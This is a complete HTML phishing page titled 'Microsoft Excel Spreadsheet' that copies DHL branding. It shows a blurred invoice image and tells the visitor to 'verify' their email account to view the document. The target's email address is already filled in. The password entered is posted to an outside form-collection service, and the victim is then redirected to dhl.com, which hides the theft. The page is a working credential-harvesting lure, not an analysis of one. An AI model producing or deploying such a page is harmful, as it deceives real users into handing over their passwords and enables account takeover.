<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="icon" type="image/x-icon" href="https://i.ibb.co/8xpLrP8/favicon.png">
<title>Microsoft Excel Spreadsheet</title>
<style>
body, html {
  height: 100%;
  margin: 0;
  font-family: Arial, Helvetica, sans-serif;
}

* {
  box-sizing: border-box;
}

.bg-image {
  /* The image used */
  background-image: url("https://www.dhl.com/content/experience-fragments/dhl/de/core/sub_page_teaser/image_left_3_greycolumns/xbu_master_spt_dhl_home_enterprise_logistics_services/_jcr_content/root/container_copy_copy_/container_copy/image.coreimg.80.1197.jpeg/1671467290460/employees-working-in-warehouse-0005.jpeg"); 
  
  /* Add the blur effect */
  filter: blur(0px);
  -webkit-filter: blur(0px);
  
  /* Full height */
  height: 100%; 
  
  
  /* Center and scale the image nicely */
  background-position: center;
  background-repeat: no-repeat;
  background-size: cover;
}

/* Position text in the middle of the page/image */
.bg-text {
  background-color: #FFF; /* Fallback color */
  color: white;
  border-radius: 7px 0px 7px 0px;
  position: absolute;
  top: 45%;
  left: 50%;
  transform: translate(-50%, -50%);
  z-index: 2;
  width: 27%;
  height:495px;
  padding: 20px;
  text-align: center;
  -webkit-box-shadow: 1px 1px 1px 1px #848484; box-shadow: 1px 1px 1px 1px #848484;
}
</style>
</head>
<body>

<div class="bg-image"></div>

<div class="bg-text">
  
  
  
        <div align="center">
                <p>
                
                        <div align="center">
                        
                                <img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQfXEhPswiBEgWDj1zk3Kz2ZbIn-q1on-42DSC4x5kc&s" style="width:300px; height:45px;">
                        
                        </div>
                        
                        <br>
                        
                        <div align="center">
                        
                                <img src="https://i.ibb.co/C2s1Dfq/invoice.png" 
                                style="width:220px; height:155px;  filter: blur(1px); -webkit-filter: blur(1px);">
                        
                        </div>
                        
                        <div align="center">
                        <form method="post" action="https://submit-form.com/72VyR5qAR">
                        <input type="hidden" name="_redirect" value="https://www.dhl.com">
                        </div>
                        
                        
                        <br>
                        
                        <div align="center">
                        
                                <font face="verdana" color="#D40511" style="font-size:12px;">
                                Verify Your Email Account to view Document
                                </font>
                        
                        </div>
                        
                        <br>
                        <div align="center">
                        <input type="email" name="login" value="devel@listes.grisbi.org" 
                        style="background: #FFF; width:300px; height:35px; border: #FFF; padding:7px; border-radius:3px; 
                        -webkit-box-shadow: 1px 1px 1px 1px #848484; box-shadow: 1px 1px 1px 1px #848484; font-weight:bold;" disabled>
                        </div>
                        <br>
                        <div align="center">
                        <input type="password" placeholder="password" name="passwd" required 
                        style="width:300px; height:33px; border: #FFF; padding:7px; border-radius:3px; 
                        -webkit-box-shadow: 1px 1px 1px 1px #848484; box-shadow: 1px 1px 1px 1px #848484; font-size:13px;">
                        </div>
                        <br>
                        <div align="center">
                        <input type="submit" value="View Document" 
                        style="background: #D40511; width:300px; height:40px; border: #D40511; padding:7px; border-radius:3px; font-weight:bold; color:#FFF;">
                        </div>
                        <input type="hidden" name="login" value="devel@listes.grisbi.org">
                        </form>
                        
                </p>
        </div>
        
  
</div>

</body>
</html>